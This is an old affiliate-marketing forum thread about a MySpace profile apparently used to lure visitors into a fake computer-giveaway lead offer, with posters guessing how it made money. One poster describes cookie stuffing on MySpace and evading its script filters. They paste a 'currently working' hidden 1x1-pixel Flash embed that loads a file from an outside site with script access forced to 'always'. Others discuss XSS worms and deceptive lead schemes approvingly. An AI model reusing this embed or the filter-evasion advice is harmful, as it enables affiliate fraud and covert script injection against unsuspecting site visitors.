Found this going through myspace

ok guys, so i got a friend request from a ... chick i guess, went to her profile and found something odd.

here is the url, i am only putting this on here so you can study it and figure out how they did it. maybe you guys can figure it out,
i think this is a cpa thing, can't be an ewhore thing because it doesnt lead to anything like that.
so, to the mods, please delete this if it is inappropriate, or if you think that it is not right.

HTML:

http://www.myspace.com/506289604

This is only for others to maybe study it and get a few ideas on how to do this.
i tried ever code i can think of with myspace, and this just blew my mind.

EDIt: this is not mine

 

Wow, thats the LAST thing I expected to see!

I wonder how they are monetizing this?

Interesting...

 

That is cool

 

Theres a macbook air email submit at the end.. probably a rotator for various computer offers. They pre-qualify the lead by telling them its a Dell giveaway.. so they want a computer, enter my email? ok.. lemme get it.. boom paid. The end. But yeah idk how 'modules' and uploading your own css works with myspace.. maybe the old comedian profile trick?

Save the page as complete and look at the basebundle_utqnbzen.css file and what .autoresize is doing.. thats where the magic happens.

Good luck

 

hmm good idea, i think ill get working on something like this, because whoever did this, is gonna make some good money.

 

aww the profile was taken down I think.. I know even crazier things are possible with myspace. There's things such as xss worms(they have fixed most of the ways to do these) look up samy myspace on google for more info on that.
I will give you all a hint to doing basically whatever you want to on myspace tho. They allow flash. Flash can call websites outside of the one its on. You use the flash to call javascript, visual basic script, or php that calls other things. There is quite a bit of possibilities. Allowing any external code can be a security threat if you know how to use it.

 

Whatever it was, MySpace didn't like it:

This user has either cancelled their membership, or their account has been deleted.

 

This always happens... This time, it was fast!

buah haha hahaha!

 

Daw.. now I wanna know! It's killing me..

 

I pretty much gave it away in my post if you are willing to learn it, but I will not share on here because many of the methods that can be used are illegal.

 

I believe myspace has fixed that as all objects now are turned off by default. "allowScriptAccess=never"

 

Oops,

Invalid Friend ID.
This user has either cancelled their membership, or their account has been deleted.


Anyone got a screenshot of the profile? I would like to get an idea of what you guys are talking?

 

Maybe it's not such a good idea to implememnt this afterall since myspace took it down with the quickness.

 

Well, I wouldn't spend much time analyzing or lamenting this particular method if Myspace dropped the hammer on it so quickly. Probably a good idea but needs more CYA...

 

My c00kie stuffing on myspace goes to a remote page. That allow script access thing can be gotten around pretty easily. It is also possible to do it with images. You have to be creative with your coding to get around their filters though, but it is possible. I'm not sure if I'm allowed to make a guide on how to do it on this forum, but maybe I'll make one and post it up in vip.

Myspace has by default for flash apps that are embedded 'allowscriptaccess=false' embedded with it...so you cant execute JS directly on the page. You can get around this by using flash to call php which calls java though. I'm not saying its easy because you have to make the code a certain way to escape their filters, but it is possible. Also most of their limits apply to embed tags you can use flash objects fine. An example that is currently working for me is

PHP:

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="1" height="1" id="movie" align="">
<param name=FlashVars value="cid=11&id=0">
<param name="movie" value="http://mywebsite.com/files/11.swf">
<param name="bgcolor" value="#ffffff">
<param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" FlashVars="cid=11&id=0" src="http://mywebsite.com/files/11.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
</object>

I have had no problems from myspace running this, but it also doesn't make a huge ad on my page lol.

 

What exactly was on the profile?

 

been deleted what was it?

 

I want to know too...